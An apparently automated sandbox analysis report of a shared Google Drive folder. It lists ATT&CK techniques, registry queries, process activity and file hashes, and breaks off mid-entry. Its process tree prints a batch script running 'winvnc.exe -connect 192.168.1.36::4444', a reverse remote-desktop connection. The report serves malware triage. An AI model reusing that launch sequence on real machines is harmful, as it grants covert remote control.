hxxps://drive[.]google[.]com/drive/folders/1Ss7_otRXS6ypI5_kstRLtGTCjregHJpj?usp=sharing

Analysis

max time kernel
135s
max time network
134s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
08-08-2024 17:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://drive.google.com/drive/folders/1Ss7_otRXS6ypI5_kstRLtGTCjregHJpj?usp=sharing

Score

6^/10

discovery

Malware Config

Signatures

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
7	drive.google.com
4	drive.google.com

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
3968	timeout.exe
1948	timeout.exe
556	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-355097885-2402257403-2971294179-1000_Classes\Local Settings	msedge.exe

Suspicious behavior: EnumeratesProcesses 49 IoCs

pid	Process
4124	msedge.exe
4124	msedge.exe
3004	msedge.exe
3004	msedge.exe
2996	identity_helper.exe
2996	identity_helper.exe
3464	msedge.exe
3464	msedge.exe
1584	winvnc.exe
1584	winvnc.exe
1584	winvnc.exe
1584	winvnc.exe
1816	winvnc.exe
1816	winvnc.exe
3372	winvnc.exe
3372	winvnc.exe
212	winvnc.exe
212	winvnc.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
4936	msedge.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
2768	winvnc.exe
2768	winvnc.exe
2768	winvnc.exe
2768	winvnc.exe
3336	taskmgr.exe
1764	winvnc.exe
1764	winvnc.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 8 IoCs

pid	Process
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3336	taskmgr.exe
Token: SeSystemProfilePrivilege	3336	taskmgr.exe
Token: SeCreateGlobalPrivilege	3336	taskmgr.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
1584	winvnc.exe
1584	winvnc.exe
1584	winvnc.exe
1584	winvnc.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe

Suspicious use of SendNotifyMessage 62 IoCs

pid	Process
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
3004	msedge.exe
1584	winvnc.exe
1584	winvnc.exe
1584	winvnc.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
2768	winvnc.exe
2768	winvnc.exe
2768	winvnc.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe
3336	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3004 wrote to memory of 2020	3004	msedge.exe	85
PID 3004 wrote to memory of 2020	3004	msedge.exe	85
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 2300	3004	msedge.exe	86
PID 3004 wrote to memory of 4124	3004	msedge.exe	87
PID 3004 wrote to memory of 4124	3004	msedge.exe	87
PID 3004 wrote to memory of 2748	3004	msedge.exe	88
PID 3004 wrote to memory of 2748	3004	msedge.exe	88
PID 3004 wrote to memory of 2748	3004	msedge.exe	88
PID 3004 wrote to memory of 2748	3004	msedge.exe	88
PID 3004 wrote to memory of 2748	3004	msedge.exe	88
PID 3004 wrote to memory of 2748	3004	msedge.exe	88
PID 3004 wrote to memory of 2748	3004	msedge.exe	88
PID 3004 wrote to memory of 2748	3004	msedge.exe	88
PID 3004 wrote to memory of 2748	3004	msedge.exe	88
PID 3004 wrote to memory of 2748	3004	msedge.exe	88
PID 3004 wrote to memory of 2748	3004	msedge.exe	88
PID 3004 wrote to memory of 2748	3004	msedge.exe	88
PID 3004 wrote to memory of 2748	3004	msedge.exe	88
PID 3004 wrote to memory of 2748	3004	msedge.exe	88
PID 3004 wrote to memory of 2748	3004	msedge.exe	88
PID 3004 wrote to memory of 2748	3004	msedge.exe	88
PID 3004 wrote to memory of 2748	3004	msedge.exe	88
PID 3004 wrote to memory of 2748	3004	msedge.exe	88
PID 3004 wrote to memory of 2748	3004	msedge.exe	88
PID 3004 wrote to memory of 2748	3004	msedge.exe	88

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://drive.google.com/drive/folders/1Ss7_otRXS6ypI5_kstRLtGTCjregHJpj?usp=sharing
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3004
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd101246f8,0x7ffd10124708,0x7ffd10124718
  2⤵
  PID:2020
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,5908374892232972995,4848706755235943834,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2172 /prefetch:2
  2⤵
  PID:2300
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,5908374892232972995,4848706755235943834,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4124
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,5908374892232972995,4848706755235943834,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2800 /prefetch:8
  2⤵
  PID:2748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,5908374892232972995,4848706755235943834,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:1
  2⤵
  PID:5060
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,5908374892232972995,4848706755235943834,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
  2⤵
  PID:1348
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,5908374892232972995,4848706755235943834,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 /prefetch:8
  2⤵
  PID:4980
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,5908374892232972995,4848706755235943834,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5404 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,5908374892232972995,4848706755235943834,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:1
  2⤵
  PID:4268
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,5908374892232972995,4848706755235943834,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:1
  2⤵
  PID:3504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,5908374892232972995,4848706755235943834,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4892 /prefetch:1
  2⤵
  PID:2648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,5908374892232972995,4848706755235943834,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5308 /prefetch:1
  2⤵
  PID:4760
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,5908374892232972995,4848706755235943834,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5284 /prefetch:1
  2⤵
  PID:1512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2164,5908374892232972995,4848706755235943834,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5172 /prefetch:8
  2⤵
  PID:748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,5908374892232972995,4848706755235943834,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5176 /prefetch:1
  2⤵
  PID:1152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2164,5908374892232972995,4848706755235943834,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5896 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,5908374892232972995,4848706755235943834,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1292 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4936

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2752

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4780

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:1804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\client-20240808T174518Z-001\client\main.bat" "
1⤵
PID:4444
- C:\Users\Admin\Downloads\client-20240808T174518Z-001\client\winvnc.exe
  winvnc.exe -run
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1584
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:1948
- C:\Users\Admin\Downloads\client-20240808T174518Z-001\client\winvnc.exe
  winvnc.exe -connect 192.168.1.36::4444
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1816

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\client-20240808T174518Z-001\client\main.bat" "
1⤵
PID:4608
- C:\Users\Admin\Downloads\client-20240808T174518Z-001\client\winvnc.exe
  winvnc.exe -run
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3372
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:556
- C:\Users\Admin\Downloads\client-20240808T174518Z-001\client\winvnc.exe
  winvnc.exe -connect 192.168.1.36::4444
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:212

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /7
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\client-20240808T174518Z-001\client\main.bat" "
1⤵
PID:2464
- C:\Users\Admin\Downloads\client-20240808T174518Z-001\client\winvnc.exe
  winvnc.exe -run
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SendNotifyMessage
  PID:2768
- C:\Windows\system32\timeout.exe
  timeout /t 1
  2⤵
  - Delays execution with timeout.exe
  PID:3968
- C:\Users\Admin\Downloads\client-20240808T174518Z-001\client\winvnc.exe
  winvnc.exe -connect 192.168.1.36::4444
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1764

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
e4f80e7950cbd3bb11257d2000cb885e

SHA1
10ac643904d539042d8f7aa4a312b13ec2106035

SHA256
1184ee8d32d0edecddd93403fb888fad6b3e2a710d37335c3989cc529bc08124

SHA512
2b92c9807fdcd937e514d4e7e1cc7c2d3e3aa162099b7289ceac2feea72d1a4afbadf1c09b3075d470efadf9a9edd63e07ea7e7a98d22243e45b3d53473fa4f0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
2dc1a9f2f3f8c3cfe51bb29b078166c5

SHA1
eaf3c3dad3c8dc6f18dc3e055b415da78b704402

SHA256
dcb76fa365c2d9ee213b224a91cdd806d30b1e8652d72a22f2371124fa4479fa

SHA512
682061d9cc86a6e5d99d022da776fb554350fc95efbf29cd84c1db4e2b7161b76cd1de48335bcc3a25633079fb0bd412e4f4795ed6291c65e9bc28d95330bb25

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
e840e19b57a4e6c6a609fa8c8cc8dfc8

SHA1
9611cfc609f5fcc8ce0052a2cddac8905323581b

SHA256
665259149afb05b94d6e3d81e9b4cd741e74f7afca3b62f76ad36203cdbeafdf

SHA512
db1824325d4c26d2941ef2603e0b6fb2d791b80a5ae2533235da43fd39920fc59714e3f5c2d532865aac5638cc9aac474ec91bc65901a1e6fc03648921e45e5d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
9b339f1170581b4b3283d4d6fe091f86

SHA1
d035eb9e05dc5fac0c424e8aca2dd8a7b226bdf3

SHA256
348e380bab591ffee8db2d0d85ef49fc41dd9c558d44b9868dd3a3eb3680a7bb

SHA512
0e6531984bf9177325fc5ede020455c09d48720c5580e251368c323d154428e7df8323c148b145a5ab8555466a2b182d944fa244b48422b5dbd25cfbf9feefe1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
5cc0434a237f8aff2e5468a3b7f2b611

SHA1
3bd058bf4d9e699defebd2214246297140e8bba7

SHA256
93065451528f0efbb6a6bb15438ba3904828eba3894fae227b9d83fe6b4abfba

SHA512
3eeb4db1620e5013c58b3e4e119bc7959c12837dc4735635268b26a8f09d1ceed539cd3d2b387e431c70fceb4292dd435b7f4cb95c340c435073cb77b0a17090

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
f20f34211f6d50284a5e1e34fb66bb8a

SHA1
4a3b2a2c90dedb3f2ab94834358de6a6c932c95b

SHA256
c25c84b55d045b0fa5b18deaea4a74b6e7eea2bd566c429a44098ba473afb976

SHA512
a72b4672c6e2629b0b12aa871b412c4d973d73a3838c4823e22ba6644dc5b072b38d81505208dbb03179f03d945ac2384916135f5c9ee926abad71d1b14892df

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
362ed55353ff5ec198b1b5460ef6ce0a

SHA1
50fef68cdd5a11edddac9a73137cf0998e0808f9

SHA256
c2b680e2ab3b199a9fd8098cff35b8e062a43a3b0133acbe8d1f7a056f2d3c2a

SHA512
a6bd4a439650f03d9b813e94ba749541d7c23830b5321345ded92bd201b60c8d3cdba7ca93876fddbbce1272fd5ec13e46994a0d8fc38e7b44743467e8f1f433

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
e1ca5c79f024cd5928c6f82dbda3e1ab

SHA1
867931870b64f47aee6372b098b4c47afb4f56d1

SHA256
2b01c9cab5e8e89aeedfbbc1fcb7e6bd99956cf484089978562876e6b6200f79

SHA512
5fca5a39e6d255a368571fdefcffffcf2810654dfceb7a9ca41d9204d6265c04ff058c5fb75acac245a77066276f312f38087cc9f543ee05dcd281a9acf3ac4b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
8f26fa039cbb92bac325f85dde0eef14

SHA1
b447736f86207c0bdd13dc039d833447739215e4

SHA256
c2babef98227b59b4fc83b6e9748f3eb74498fe98855f761f6fa12cf7c2cb8bc

SHA512
8a99161a4b303361b8ca4660e52817d93e7e5950164d48b0a351bc872889f2777614c8219999458d816862c18654bd8e47a3de15135e6a477398f767d595bad4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
1381fe1d0f8f0c676117dd662e47c045

SHA1
ac869709176c60d168f8cce3724ce3e0ffe92778

SHA256
242fd3b062b8acf567f4cee62c524e2d517b5a24d609a48eacd72b9e14618849

SHA512
253d4b50f2c7dffa4e60cfa40610d1dbc2f9d203f4b65eb983f07b3d3ca9066ae87b275c1e5a108467a51f0dea2c298731ed6248bb7f70d9ceb6137cdf86d89b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

Filesize
1KB

MD5
00a23eb6e1ae8c33fb89ddf554a65f61

SHA1
9e1eaf1fc34523c631d491faefb5a64352183ad5

SHA256
cb884cd2b07b396ad959ed6bb1fa763a248ef08adb2c70bc76c93b813aa22c8a

SHA512
af65e0f8f58aec42fad1399055192a5ce3996c4c80c9f77d3eb326434abdf65f96dbbb969b203e370c71bd5560bd54fd1568e742f80f40dba3ccda4d685e67ea

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57b44c.TMP

Filesize
1KB

MD5
f3e5fa0c0024f268c69fca428c68f1d6

SHA1
563e4e76e9603d2eaa3f5b5b6436119029ecc8e7

SHA256
97babf82128e23c676c4dc007255f512bd7f28336ea3e0b1f094380408717b01

SHA512
b0499e26a7a0afaaac4bff9ea5a64a41ae4a82f99bffc272d150b79085eb3d1db96fe2b230bfec5d41b63d5bdbc48001ba3a9cc14cffeb07f1eb0fbc08cd9f61

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
